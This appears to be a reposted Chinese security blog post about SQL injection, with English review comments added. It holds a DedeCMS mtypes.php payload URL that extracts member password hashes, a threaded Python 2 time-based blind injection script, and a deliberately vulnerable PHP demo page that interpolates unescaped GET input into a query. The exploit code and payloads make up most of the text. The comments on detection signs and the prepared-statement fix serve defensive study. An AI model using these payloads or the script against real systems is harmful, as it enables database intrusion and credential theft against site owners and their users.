localhost/data/admin/ver.txt
查看补丁
member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a' and `'`.``.mtypeid or if(ascii (substr((select pwd from dede_member limit 1),1,1))%3d50,1,0) and mtypeid%3d1%23]=名字&_FILES[mtypename][size]=.xxxx
织梦的默认可以K掉注入。。所以必须要手工试着枚举可能 所有英文字母、、
对照一下 ASCII 码表~
如果有跟我一样懒的话,可以参照 lcy 影牛写的一个 py 脚本,配合 php 跑延迟注入
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2015-08-29 22:26:17
# @Last Modified by: Lcy
# @Last Modified time: 2015-08-30 01:37:01
# blog:https://phpinfo.me
# Time-delay (blind) SQL injection tool
#
# NOTE(review): the page lost this listing's line breaks and indentation; the
# layout below is reconstructed from the syntax, so block nesting (notably in
# getData) should be confirmed against the author's original.
#
# What the script does, as far as the code shows: it sends GET requests to a
# test page on localhost whose `username` parameter is concatenated into a SQL
# statement, and infers the value of `select user()` purely from how long each
# response takes. This is Python 2 code (print statements, urllib2,
# `except Exception ,e`).
#
# What this traffic looks like to a defender:
#   * the `username` value carries SQL keywords and functions (if, sleep,
#     length, mid, lpad, bin, ord) and ends in %23 (an encoded '#' comment);
#   * getLength() probes arrive one at a time through `requests`, so they carry
#     that library's default User-Agent;
#   * getData() probes arrive in bursts of eight parallel requests per
#     character, all with the fixed Safari User-Agent set in request();
#   * probes whose condition is true hold the connection for the sleep
#     duration (2 s for bit probes, 1 s for length probes), which shows up as
#     response-time outliers and as SLEEP() calls in database query logs.
# Binding the parameter through a prepared statement removes the injection
# point; none of the probes work once the input can no longer alter the query.
import urllib2
import time
import socket
import threading
import requests


class my_threading(threading.Thread):
    """Worker thread that tests a single bit of a single character.

    `str` is the bit position (callers pass 1..8) and `x` is the character
    position (callers pass 1..dataLength).
    """

    def __init__(self, str,x):
        # The parameter named `str` shadows the builtin only inside __init__;
        # run() below still reaches the builtin str().
        threading.Thread.__init__(self)
        self.str = str
        self.x = x

    def run(self):
        """Send one probe and store the observed bit in the global `res` dict."""
        global res
        x=self.x
        j = self.str
        # URL-decoded, the injected condition is:
        #   if(1=(mid(lpad(bin(ord(mid((select user()),x,1))),8,0),j,1)),sleep(2),0)#
        # i.e. take character x of user(), render its code as an 8-digit binary
        # string, and sleep 2 seconds when digit j is '1'.
        url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
        html = request(url)
        verify = 'timeout'
        # request() returns the literal 'timeout' when the fetch raised; the
        # bit is recorded as 1 whenever that substring appears in the result.
        if verify not in html:
            res[str(j)] = 0
            #print 1
        else:
            res[str(j)] = 1


def request(URL):
    """Fetch URL with urllib2 using a 2-second timeout.

    Returns the response body, or the string 'timeout' if urlopen raised any
    exception (the handler catches Exception, not only timeouts).
    """
    # Hard-coded browser User-Agent sent with every bit probe.
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
    try:
        request = urllib2.urlopen(req,timeout=2)
    except Exception ,e:
        # Waits a further 2 seconds before reporting the failure to the caller.
        time.sleep(2)
        return 'timeout'
    return request.read()


def curl(url):
    """Issue a GET through `requests` and return int(time.clock()) taken afterwards.

    `start` is assigned but never read; the returned value is int(end), not
    the difference end - start. On requests.RequestException the function
    prints a message (Chinese for "access error!") and exits the process.
    """
    try:
        start = time.clock()
        requests.get(url)
        end = time.clock()
        return int(end)
    except requests.RequestException as e:
        print u"访问出错!"
        exit()


def getLength():
    """Probe candidate lengths 0, 1, 2, ... and return the first that curl() reports as >= 1.

    URL-decoded, the injected expression is
    sleep(if(length((select user()))=i,1,0))# -- a 1-second sleep when the
    length of user() equals i. The loop has no upper bound.
    """
    i = 0
    while True:
        print "[+] Checking: %s " %i
        url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
        timeout = curl(url)
        if timeout >= 1:
            # Message text is Chinese for "data length is: %s".
            print u"[+] 数据长度为: %s" %i
            return i
        i = i + 1


def bin2dec(string_num):
    """Convert a string of binary digits to an int."""
    return int(string_num, 2)


def getData(dataLength):
    """Recover `dataLength` characters, one per outer iteration, and print them.

    For each character position, eight my_threading workers are started (bit
    positions 1..8) and joined; their results are read back from the global
    `res` dict, concatenated into an 8-digit binary string and converted to a
    character.
    """
    global res
    data = ""
    for x in range(dataLength):
        x = x + 1  # positions passed to the workers are 1-based
        #print x
        threads = []
        for j in range(8):
            result = ""
            j = j + 1  # bit positions are 1-based as well
            sb = my_threading(j,x)
            sb.setDaemon(True)
            threads.append(sb)
            #print j
        # All eight probes for this character are in flight at the same time.
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        #print res
        tmp = ""
        for i in range(8):
            tmp = tmp + str(res[str(i+1)])
        #print chr(bin2dec(tmp))
        res = {}  # reset the shared dict before the next character
        result = chr(bin2dec(tmp))
        print result
        data = data + result
        sb = None
    print "[+] ok!"
    print "[+] result:" + data


if __name__ == '__main__':
    stop = False  # assigned here but not read anywhere in the visible code
    res = {}      # shared between getData() and the worker threads
    length = getLength()
    getData(length)

# ---------------------------------------------------------------------------
# The listing below is a separate PHP file on the page -- presumably the
# /demo/1.php test page that the URLs above point at (confirm against the
# original post).
# ---------------------------------------------------------------------------
<?php
/*
 * @Author: Lcy
 * @Date: 2015-08-29 22:09:59
 * @Last Modified by: Lcy
 * @Last Modified time: 2015-08-30 00:34:31
 * Delay (time-based) injection test page
 */
// Deliberately vulnerable demo. As written it connects as root with an empty
// password, selects the `mysql` system schema, and uses the legacy mysql_*
// extension (removed in PHP 7). It should only ever exist on an isolated
// test host.
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
// $_GET['username'] is interpolated into the statement with no escaping or
// binding -- this is the injection point. A non-demo page would pass the value
// as a bound parameter of a prepared statement (mysqli or PDO) and would use a
// database account limited to the tables it needs.
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
// The SQL text is echoed, but the query result never is, so a client learns
// nothing from the body beyond the statement itself.
echo $sql;
$query = mysql_query($sql);
// Message text is Chinese for "this is an injection point with no echoed output".
echo "这是一个没有任何回显的注入点";
?>
转自:http://www.silic.top/index.php/archives/7/